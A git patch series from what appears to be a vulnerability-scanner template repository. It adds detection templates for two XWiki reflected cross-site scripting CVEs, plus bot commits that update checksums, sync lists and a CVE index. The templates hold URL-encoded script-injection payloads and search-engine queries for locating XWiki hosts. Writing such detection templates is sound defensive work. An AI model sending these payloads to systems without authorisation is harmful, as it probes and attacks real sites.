http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-3274.yaml http/cves/2024/CVE-2024-34982.yaml +http/cves/2024/CVE-2024-3552.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml From 9201fb6050da246c7910b4e497612bb36554aead Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 20 Jun 2024 10:14:52 +0000 Subject: [PATCH 0454/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 54bdccada6..39c6b9be49 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -34,6 +34,7 @@ on: - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-3274.yaml' - 'http/cves/2024/CVE-2024-34982.yaml' + - 'http/cves/2024/CVE-2024-3552.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' From 00c08b64f3d073e209378d658236c82a4e2738d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 10:15:50 +0000 Subject: [PATCH 0455/1841] Auto Template Signing [Thu Jun 20 10:15:50 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3552.yaml | 1 + http/exposures/files/ftpconfig.yaml | 3 +-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index e53ba3744d..58f2de36c3 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -47,3 +47,4 @@ http: - 'status_code == 200' - regex('^\[\]$', body) condition: and +# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/ftpconfig.yaml b/http/exposures/files/ftpconfig.yaml index 8294420124..eb5cce7910 100644 --- a/http/exposures/files/ftpconfig.yaml +++ b/http/exposures/files/ftpconfig.yaml @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022038b25462e3325f19569cd795578decf6a4d9a9faa965793574ad334e6058660f022100fd1c9874ca616332e03cdca6a9ce02e6d3f92e3503a3627076e6e8025030c876:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e964492aa5ae873f03597ac2a5b426d215393200bd9a91a40eb7140836f033d022100d12b8356b48603f84427b50a84d0078581d289d3d7e9f95cf8310044a880bc29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c8fbfad802db682e88837aebac9fd67f73c45183 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:50:43 +0530 Subject: [PATCH 0456/1841] Create CVE-2023-46732.yaml --- http/cves/2023/CVE-2023-46732.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-46732.yaml diff --git a/http/cves/2023/CVE-2023-46732.yaml b/http/cves/2023/CVE-2023-46732.yaml new file mode 100644 index 0000000000..eff8e64d46 --- /dev/null +++ b/http/cves/2023/CVE-2023-46732.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-46732 + +info: + name: XWiki < 14.10.14 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation. + impact: | + Successful exploitation could lead to cross-site scripting attack. + remediation: | + This has been patched in XWiki 15.6 RC1, 15.5.1 and 14.10.14. + reference: + - https://jira.xwiki.org/browse/XWIKI-21095 + - https://nvd.nist.gov/vuln/detail/CVE-2023-46732 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-46732 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e" + - "{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains(body, "\" id=\"tmViewSource")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 47deab50035364502028a18a5c925ab1c4ece341 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:52:19 +0530 Subject: [PATCH 0457/1841] Create CVE-2023-45136.yaml --- http/cves/2023/CVE-2023-45136.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-45136.yaml diff --git a/http/cves/2023/CVE-2023-45136.yaml b/http/cves/2023/CVE-2023-45136.yaml new file mode 100644 index 0000000000..4707924f24 --- /dev/null +++ b/http/cves/2023/CVE-2023-45136.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-45136 + +info: + name: XWiki < 14.10.14 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When document names are validated according to a name strategy (disabled by default), XWiki starting in version 12.0-rc-1 and prior to versions 12.10.12 and 15.5-rc-1 is vulnerable to a reflected cross-site scripting attack in the page creation form. This allows an attacker to execute arbitrary actions with the rights of the user opening the malicious link. + impact: | + Successful exploitation could lead to cross-site scripting attack. + remediation: | + This has been patched in XWiki 14.10.12 and 15.5-rc-1 by adding appropriate escaping. + reference: + - https://jira.xwiki.org/browse/XWIKI-20854 + - https://nvd.nist.gov/vuln/detail/CVE-2023-45136 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-45136 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains_all(body, "", "data-xwiki-reference")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From bd5fc2ee78477adf57e2d923706c3c299d0d96c0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 20 Jun 2024 10:31:06 +0000 Subject: [PATCH 0458/1841] Auto Generated New Template Addition List [Thu Jun 20 10:31:06 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index b7e773e68e..3a3478e3a7 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,8 @@ http/cves/2023/CVE-2023-32068.yaml http/cves/2023/CVE-2023-37645.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml +http/cves/2023/CVE-2023-45136.yaml +http/cves/2023/CVE-2023-46732.yaml http/cves/2023/CVE-2023-48241.yaml http/cves/2023/CVE-2023-50719.yaml http/cves/2023/CVE-2023-50720.yaml From 908d3572d1ecb46bf7914bc8b1f1e2f8f5158451 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 10:31:13 +0000 Subject: [PATCH 0459/1841] Auto Generated Templates Checksum [Thu Jun 20 10:31:13 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8508b8c03f..0e92d9642e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3190,6 +3190,7 @@ http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 +http/cves/2023/CVE-2023-45136.yaml:05fb69618e8482eddb6e118b3424acf60cd6ef83 http/cves/2023/CVE-2023-4521.yaml:bf7e36be57080136c6ecbbc5e1d1844a5df269ec http/cves/2023/CVE-2023-45375.yaml:7279d79b85a43bff82cd0fdb9796ce516167493b http/cves/2023/CVE-2023-4542.yaml:c0a79c6b0145c8d875e16d60d6a0fea2632dd99b @@ -3328,7 +3329,7 @@ http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 -http/cves/2024/CVE-2024-29824.yaml:1fbe1ce025b6c27942a9b3675b6f62c20481c1d6 +http/cves/2024/CVE-2024-29824.yaml:46f1ec812df6008b68dadfc51bc4453cbeda7539 http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 @@ -3352,6 +3353,7 @@ http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 +http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -4869,7 +4871,7 @@ http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 http/exposures/files/exposed-alps-spring.yaml:0bc7763901ec79b827388db7d80f1c2838d73f1e http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 -http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d +http/exposures/files/ftpconfig.yaml:69647a0218fb21aa1c46b54dbdb6e1348ea3df6e http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 http/exposures/files/generic-db.yaml:4266cdbc5a945de5d3c5f82ec2ad2acf9edbe684 @@ -8686,7 +8688,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:03570ee1d7c17eb57fa661e7af634577289fd1a8 +templates-checksum.txt:835d240e8d683f77b4d1ed05e186a2fba32efa59 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3bf3ef48502ecaea1b51d5076091e66e57ecde1a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 20 Jun 2024 10:31:54 +0000 Subject: [PATCH 0461/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 39c6b9be49..1b4abea180 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,8 @@ on: - 'http/cves/2023/CVE-2023-37645.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' + - 'http/cves/2023/CVE-2023-45136.yaml' + - 'http/cves/2023/CVE-2023-46732.yaml' - 'http/cves/2023/CVE-2023-48241.yaml' - 'http/cves/2023/CVE-2023-50719.yaml' - 'http/cves/2023/CVE-2023-50720.yaml' From 561f79056d47345aefd555c080d32397e4eaf767 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 10:32:54 +0000 Subject: [PATCH 0462/1841] Auto Template Signing [Thu Jun 20 10:32:54 UTC 2024] :robot: --- http/cves/2023/CVE-2023-45136.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-45136.yaml b/http/cves/2023/CVE-2023-45136.yaml index 4707924f24..a510ce03e6 100644 --- a/http/cves/2023/CVE-2023-45136.yaml +++ b/http/cves/2023/CVE-2023-45136.yaml @@ -42,3 +42,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and +# digest: 490a0046304402202a79398f18d7c34b32acc60b37bbc9f9166e7575618fbb4db65de12e5b677ccd0220018dd12927fdb84708570d206d8c1dee90ed52498ddd43d454415136b29b2cf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4aef27031dd52f0700ae16f9905ebfb4b3ba716f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 10:33:50 +0000 Subject: [PATCH 0463/1841] Auto Generated cves.json [Thu Jun 20 10:33:50 UTC 2024] :robot: --- cves.json | 8 ++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e97beebff2..f1fae6b2f8 100644 --- a/cves.json +++ b/cves.json @@ -2283,6 +2283,7 @@ {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} {"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} +{"ID":"CVE-2023-45136","Info":{"Name":"XWiki \u003c 14.10.14 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When document names are validated according to a name strategy (disabled by default), XWiki starting in version 12.0-rc-1 and prior to versions 12.10.12 and 15.5-rc-1 is vulnerable to a reflected cross-site scripting attack in the page creation form. This allows an attacker to execute arbitrary actions with the rights of the user opening the malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45136.yaml"} {"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} {"ID":"CVE-2023-4542","Info":{"Name":"D-Link DAR-8000-10 - Command Injection","Severity":"critical","Description":"D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4542.yaml"} @@ -2297,6 +2298,7 @@ {"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} {"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} {"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"} +{"ID":"CVE-2023-46732","Info":{"Name":"XWiki \u003c 14.10.14 - Cross-Site Scripting","Severity":"medium","Description":"XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-46732.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"} {"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"} @@ -2397,7 +2399,9 @@ {"ID":"CVE-2024-23692","Info":{"Name":"Rejetto HTTP File Server - Template injection","Severity":"critical","Description":"This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23692.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} +{"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} +{"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"} {"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} @@ -2419,6 +2423,8 @@ {"ID":"CVE-2024-28995","Info":{"Name":"SolarWinds Serv-U - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-28995.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} +{"ID":"CVE-2024-29824","Info":{"Name":"Ivanti EPM - Remote Code Execution","Severity":"critical","Description":"An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2024/CVE-2024-29824.yaml"} +{"ID":"CVE-2024-29973","Info":{"Name":"Zyxel NAS326 Firmware \u003c V5.21(AAZF.17)C0 - Command Injection","Severity":"critical","Description":"The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.\n","Classification":{"CVSSScore":"9.88"}},"file_path":"http/cves/2024/CVE-2024-29973.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} @@ -2440,6 +2446,8 @@ {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} +{"ID":"CVE-2024-34982","Info":{"Name":"LyLme-Spage - Arbitary File Upload","Severity":"high","Description":"An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34982.yaml"} +{"ID":"CVE-2024-3552","Info":{"Name":"Web Directory Free \u003c 1.7.0 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and 